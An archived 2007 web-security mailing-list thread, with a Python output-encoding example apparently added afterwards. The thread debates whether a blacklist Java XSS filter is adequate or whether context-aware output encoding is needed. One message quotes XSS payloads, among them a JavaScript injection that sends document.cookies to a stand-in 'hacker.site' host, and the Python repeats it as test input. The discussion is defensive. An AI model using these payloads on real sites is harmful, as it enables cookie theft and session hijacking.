Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
- From: Anurag Agarwal <a_agrawwal@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
- Date: Tue, 23 Jan 2007 11:05:54 -0800 (PST)
I agree that it does not cover all the websites. For example, blogs which let you enter certain HTML characters or the mathematics site you mentioned, but then in my opinion 5-10% of the websites would require such data, and even those sites would not require it in all of the input. Most of the websites in their regular functionality would not even need the filtered characters here as input.

Anti-XSS libraries or such options exist, but there are two things I wanted to mention about them:

1. How many developers would put in an effort to understand the library and use it as directed? This is a very simple approach and any Java developer would be able to understand this. Moreover, it is very easy to implement.
2. This is a very lightweight module as compared to an anti-XSS library. In a production environment, why would you want to add more CPU processing when you don't need it? With my example this is as simple as it gets for the websites which really don't need any of the blacklisted characters here.

Also,
Even if this approach is considered a blacklisted-characters approach, in my opinion these are the characters which are used in combination to perform an attack (for example using backslash as escape character, 0x for hex, etc.). So by blocking them we cover most of the bases (when I say most, I mean I am not sure if I missed any character, and hence posted here for my fellow appsec professionals to uncover any such character).

Lastly -
One thing I would like to point out here is that in my personal opinion more than 40% of the code in production is a result of copy-paste from the internet. Developers are looking for a solution which is easier to understand and implement. My solution here may be limited for certain types of websites but can definitely work for most of them.

Unless a proper anti-XSS library is built into the framework, there is a bigger chance that the developers might not use it properly. This code here can fix most of the vulnerabilities. Agreed, not all, but then that's why I posted on these forums to get ideas to build this into a more robust and reusable XSS filter.

Cheers,

Anurag Agarwal

SEEC - An application security search engine
Web: www.attacklabs.com , www.myappsecurity.com
Email : anurag.agarwal@yahoo.com
Blog : http://myappsecurity.blogspot.com


----- Original Message ----
From: celf <celf@cudge.org>
To: "webappsec @OWASP" <webappsec@lists.owasp.org>
Cc: WASC Forum <websecurity@webappsec.org>
Sent: Tuesday, January 23, 2007 8:25:14 AM
Subject: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks

Hello,

The main problem I see with it is that it could corrupt your data. There may be cases when you actually need those characters to be stored. Take, for example, mathematics. It's not uncommon for greater-than, etc., symbols to be used. Input validation as a means to make output safe does not work, at least not for very long. The simple approach to protecting against XSS is to encode it properly for the output layer.

I maintain that the best way to do this is to format output characters into their appropriate HTML entities (JavaScript output notwithstanding). So, < becomes &lt; or &#60;. In fact, I've a page that does no input validation at all, but transforms every output character NOT A-Z0-9 into an HTML entity. This works even for multi-byte characters.

Second, your filtering approach is the standard "blacklist" approach, and while it may be fine for most things, there will be circumstances when it won't. Take for example:

http://www.attacklabs.com/xssfilter/filter?html=%uff1cscript%uff1ealert('xss')%uff1c/script%uff1e&B1=Submit

On your site, this simple attack does not work. However, there is a known vulnerability in .NET <= 1.1 that does allow this script to execute. Note that I didn't try very hard; someone else's YMMV.

http://lists.seifried.org/pipermail/security/2005-February/007054.html

Finally, your filter won't work for dynamic parameters being written into JavaScript (which I see all the time as an XSS vector), e.g.,

code:
response.write("<script>x='"&<%=server_side_var%>&"';alert(x);</script>")

exploit (sending this as the server side param value):
a'; document.location='hacker.site?cookies='+document.cookies;var y='a

So, your approach works, it's just tough to maintain when new exploits come out or when not applied to a very specific case. Admittedly, my approach isn't complete here either, but I'm sure others have more to add.

-c

anurag.agarwal@yahoo.com wrote:
> The source code is uploaded to the page. You can either view it
> at http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html or
> download the java file at http://www.attacklabs.com/xssfilter/XSSFilter.java
>
> The url to test this filter is http://www.attacklabs.com/xssfilter/
>
> Cheers,
>
> Anurag Agarwal
>
> SEEC - An application security search engine <http://www.myappsecurity.com/>
> Web: www.attacklabs.com <http://www.attacklabs.com/> , www.myappsecurity.com <http://www.myappsecurity.com/>
> Email : anurag.agarwal@yahoo.com <mailto:anurag.agarwal@yahoo.com>
> Blog : http://myappsecurity.blogspot.com <http://myappsecurity.blogspot.com/>
>
> ----- Original Message ----
> From: Amit Klein <aksecurity@gmail.com>
> To: Anurag Agarwal <anurag.agarwal@yahoo.com>
> Cc: WASC Forum <websecurity@webappsec.org>; "webappsec @OWASP" <webappsec@lists.owasp.org>
> Sent: Monday, January 22, 2007 11:50:06 PM
> Subject: Re: [Webappsec] xss filter to protect from xss attacks
>
> Anurag Agarwal wrote:
>> I have created an XSS filter to protect from XSS attacks. Though I have
>> filtered only 8 characters, I was able to test against all the
>> attacks mentioned in RSnake's cheat sheet. AppScan was not able to
>> detect any XSS attacks on it. I request the application security
>> community to help test this filter. 90% I am sure that you won't be
>> able to perform any XSS attack on it; the rest 10% I will find out
>> after the feedback from the community. For the curious mind, it is
>> written in Java.
> If this is an open source project - then where is the source code? If
> it's not - then why should we bother testing it?
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Webappsec mailing list
> Webappsec@lists.owasp.org
> http://lists.owasp.org/mailman/listinfo/webappsec


----------------------------------------------------------------------------
The Web Security Mailing List:
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
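The output-encoding approach celf describes (every output character NOT A-Z0-9 turned into an HTML entity, so stored data such as "1 < 2" is not corrupted) alongside the JavaScript-string case his last example raises, as an added Python example that is not from the thread or from XSSFilter.java. The render_page template and the inputs are constructed for illustration; browser_decodes_to uses html.unescape as a stand-in for the browser's entity decoding.

```python
import html


def html_entity_encode(text: str) -> str:
    """celf's rule: every character outside A-Z, a-z, 0-9 becomes a numeric
    HTML entity. Works per code point, so multi-byte characters are covered,
    and the browser decodes the text back unchanged (no data corruption)."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            out.append("&#%d;" % ord(ch))
    return "".join(out)


def browser_decodes_to(encoded: str) -> str:
    """What the HTML parser hands back for entity-encoded body text
    (html.unescape stands in for the browser here)."""
    return html.unescape(encoded)


def js_string_encode(text: str) -> str:
    """Encoding for a value placed inside a quoted JavaScript string literal,
    the context HTML entities do not cover: every character outside
    A-Z, a-z, 0-9 becomes a \\uXXXX escape (surrogate pairs for astral
    code points), so a quote, ';' or '<' in the data can never close the
    string or the <script> block."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            units = ch.encode("utf-16-be")
            for i in range(0, len(units), 2):
                out.append("\\u%04x" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)


def render_page(body_value: str, js_value: str) -> str:
    """Constructed template mirroring the thread's example: one untrusted
    value lands in HTML body text, the other inside x='...' in a script.
    Each value gets the encoder for the context it is written into."""
    return (
        "<p>%s</p>\n" % html_entity_encode(body_value)
        + "<script>x='%s';alert(x);</script>" % js_string_encode(js_value)
    )


if __name__ == "__main__":
    # Constructed inputs: the mathematics case and the JS-context payload
    # quoted in celf's message.
    math = "1 < 2 && 3 > 2"
    payload = "a'; document.location='hacker.site?cookies='+document.cookies;var y='a"
    print(render_page(math, payload))
```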